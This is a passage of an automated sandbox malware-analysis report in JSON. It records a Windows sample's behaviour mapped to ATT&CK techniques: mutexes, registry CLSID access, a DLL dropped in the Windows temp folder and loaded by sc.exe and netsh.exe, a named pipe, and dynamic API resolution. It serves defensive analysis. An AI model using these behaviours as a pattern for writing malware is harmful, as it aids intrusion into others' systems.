\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\mdzgxwae.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74F60000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 74B20000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00005700)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"KERNEL32.DLL\" at base 76620000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"WS2_32.DLL\" at base 75f90000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"DBGHELP.DLL\" at base 6f480000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"USER32.DLL\" at base 761e0000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"ADVAPI32.DLL\" at base 76080000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"SHELL32.DLL\" at base 768f0000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"OLEAUT32.DLL\" at base 75e20000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"MSVCR100.DLL\" at base 6a100000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"NTDLL.DLL\" at base 77540000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"OLE32.DLL\" at base 76790000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"CRYPTBASE.DLL\" at base 75340000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74290000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"PROPSYS.DLL\" at base 73f70000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"COMCTL32.DLL\" at base 74310000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"APPHELP.DLL\" at base 752f0000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"CLBCATQ.DLL\" at base 76700000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6a790000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76620000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"SETUPAPI.DLL\" at base 762b0000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"RPCRT4.DLL\" at base 75d10000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73f70000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"NTMARTA.DLL\" at base 748b0000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 776c0000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"PROFAPI.DLL\" at base 75460000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75700000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 764d0000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"SECUR32.DLL\" at base 75180000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 756a0000\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 752f0000\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 76130000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 76460000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70960000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 76620000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c610000\n \"mdzgxwae.exe\" loaded module \"GDI32.DLL\" at base 76130000\n \"mdzgxwae.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 76460000\n \"mdzgxwae.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70960000\n \"mdzgxwae.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"mdzgxwae.exe\" loaded module \"KERNEL32\" at base 76620000\n \"mdzgxwae.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"mdzgxwae.exe\" loaded module \"KERNEL32.DLL\" at base 76620000\n \"mdzgxwae.exe\" loaded module \"WS2_32.DLL\" at base 75f90000\n \"mdzgxwae.exe\" loaded module \"DBGHELP.DLL\" at base 6f480000\n \"mdzgxwae.exe\" loaded module \"USER32.DLL\" at base 761e0000\n \"mdzgxwae.exe\" loaded module \"ADVAPI32.DLL\" at base 76080000\n \"mdzgxwae.exe\" loaded module \"SHELL32.DLL\" at base 768f0000\n \"mdzgxwae.exe\" loaded module \"OLEAUT32.DLL\" at base 75e20000\n \"mdzgxwae.exe\" loaded module \"MSVCR100.DLL\" at base 69a30000\n \"mdzgxwae.exe\" loaded module \"SSPICLI.DLL\" at base 752d0000\n \"mdzgxwae.exe\" loaded module \"RPCRT4.DLL\" at base 75d10000\n \"mdzgxwae.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 776c0000\n \"mdzgxwae.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 752f0000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70960000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"netsh.exe\" loaded module \"KERNEL32\" at base 76620000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"netsh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c610000\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 6d9e0000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 6c2b0000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 76620000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6b970000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6b650000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 6a160000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76620000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6b4f0000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 6a130000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6b4e0000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6a120000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 6a110000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 6a0f0000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 69a80000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 699c0000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 75d10000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 68630000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 6a050000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 685c0000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 684f0000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 687b0000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 65410000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 76790000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 75340000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74290000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 74e50000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 761e0000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 76700000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6bc50000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 76080000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 776c0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 776c0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 776c0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 776c0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74be0000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 753e0000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6fcc0000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 756b0000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 74a20000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 74b20000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 75e20000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 737a0000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 75d10000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 736b0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73ad0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73440000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 776c0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 733a0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74e10000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 74cd0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 73430000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 75f90000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73710000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 71b90000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 752d0000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 776c0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74970000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00005184)\n \"6e0fc8d7b0d1c1cc6f3642b5874eb2075b33061ab54cd83ab6ab3da8b791effe.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00005184)\n 